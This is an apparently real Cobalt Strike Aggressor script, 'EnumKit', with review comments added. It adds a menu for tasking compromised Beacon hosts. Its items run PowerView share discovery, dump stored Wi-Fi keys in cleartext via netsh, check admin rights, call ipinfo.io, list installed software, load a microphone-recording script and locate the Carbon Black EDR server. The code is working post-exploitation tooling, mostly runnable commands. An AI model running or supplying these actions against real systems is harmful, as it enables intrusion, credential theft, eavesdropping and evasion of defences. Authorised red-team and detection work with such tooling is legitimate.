# Actions in this kit center around host and network enumeration. Credential enumeration actions should go in CredKit instead.
# @Und3rf10w
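# Adds an "EnumKit" submenu to the Beacon right-click menu (beacon_bottom hook).
# In every item handler $1 is the array of selected Beacon IDs. Each handler
# walks that array and, per Beacon, first records the command in the console
# transcript with binput() and then queues the task itself.
#
# Fixes relative to the previous version:
#   * The loops iterated with $bid but passed $1 (the whole selection) to every
#     call, so selecting N Beacons repeated the tasking N times. All calls now
#     use $bid.
#   * Three binput() labels did not match the command that was actually run.
#     The transcript is the operator audit trail, so it now shows the real
#     command for every item.
popup beacon_bottom {
	menu "EnumKit" {
		menu "PowerView" {
			# Imports the bundled PowerView.ps1 and runs
			# Invoke-ShareFinder -CheckShareAccess on each selected Beacon.
			item "List accessible shares" {
				local('$bid');
				foreach $bid ($1) {
					binput($bid, "powershell-import PowerView.ps1");
					bpowershell_import($bid, script_resource("EnumKit/scripts/PowerView.ps1"));
					binput($bid, "powershell Invoke-ShareFinder -CheckShareAccess");
					bpowershell($bid, "Invoke-ShareFinder -CheckShareAccess");
				}
			}
		}

		# Reports the OS architecture string via WMIC.
		item "Determine Architecture (64 vs 32)" {
			local('$bid');
			foreach $bid ($1) {
				binput($bid, "shell wmic os get osarchitecture");
				bshell($bid, "wmic os get osarchitecture");
			}
		}

		# Prints the "Statistics since" line from `net statistics server`.
		item "Show Host Uptime" {
			local('$bid');
			foreach $bid ($1) {
				binput($bid, "powershell net statistics server| Select-String \"Statistics since\"");
				bpowershell($bid, "net statistics server| Select-String \"Statistics since\"");
			}
		}

		# NOTE(review): key=clear makes netsh print stored WLAN keys in cleartext,
		# so the output (and the Beacon logs that keep it) is credential material.
		# The file header says credential actions belong in CredKit; consider
		# moving this item there and handling its logs as sensitive data.
		item "List WLAN Profiles" {
			local('$bid');
			foreach $bid ($1) {
				binput($bid, "shell netsh wlan show profiles name=\"*\" key=clear");
				bshell($bid, "netsh wlan show profiles name=\"*\" key=clear");
			}
		}

		# Evaluates whether the current Windows identity is in the built-in
		# Administrator role. The expression is kept in one place so the logged
		# command and the executed command cannot drift apart.
		item "Is User Local Admin?" {
			local('$bid $cmd');
			$cmd = "([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] \"Administrator\")";
			foreach $bid ($1) {
				binput($bid, "powershell " . $cmd);
				bpowershell($bid, $cmd);
			}
		}

		# NOTE(review): this makes the host fetch http://ipinfo.io over plain HTTP.
		# The request goes to a third-party service, is visible to any proxy or
		# network monitor on the path, and the response is not authenticated.
		item "ipinfo.io Check" {
			local('$bid');
			foreach $bid ($1) {
				binput($bid, "powershell (New-Object System.Net.WebClient).DownloadString(\"http://ipinfo.io\")");
				bpowershell($bid, "(New-Object System.Net.WebClient).DownloadString(\"http://ipinfo.io\")");
			}
		}

		# NOTE(review): `wmic product` queries Win32_Product, which is documented
		# to run a Windows Installer consistency check on every MSI package. It is
		# slow, can trigger package reconfiguration on the host, and writes
		# MsiInstaller events to the Application event log.
		item "List Installed Applications" {
			local('$bid');
			foreach $bid ($1) {
				binput($bid, "shell wmic product get Name,Version,Description /format:csv");
				bshell($bid, "wmic product get Name,Version,Description /format:csv");
			}
		}

		# Only imports the script and prints a usage hint; nothing is executed.
		# NOTE(review): audio capture is not host or network enumeration, so this
		# item looks out of scope for this kit.
		item "Import Get-MicrophoneAudio" {
			local('$bid');
			foreach $bid ($1) {
				binput($bid, "powershell-import Get-MicrophoneAudio.ps1");
				bpowershell_import($bid, script_resource("EnumKit/scripts/Get-MicrophoneAudio.ps1"));
				blog($bid, "Once imported, run \c8Get-Help Get-MicrophoneAudio -full\c0 for full usage instructions");
			}
		}

		menu "Carbon Black" {
			# Reads the sensor log at a hard-coded path and keeps only the lines
			# that mention SensorBackendServer.
			item "Get CB Server Location" {
				local('$bid');
				foreach $bid ($1) {
					binput($bid, "shell type C:\\Windows\\CarbonBlack\\Sensor.LOG | findstr SensorBackendServer");
					bshell($bid, "type C:\\Windows\\CarbonBlack\\Sensor.LOG | findstr SensorBackendServer");
				}
			}
		}
	}
}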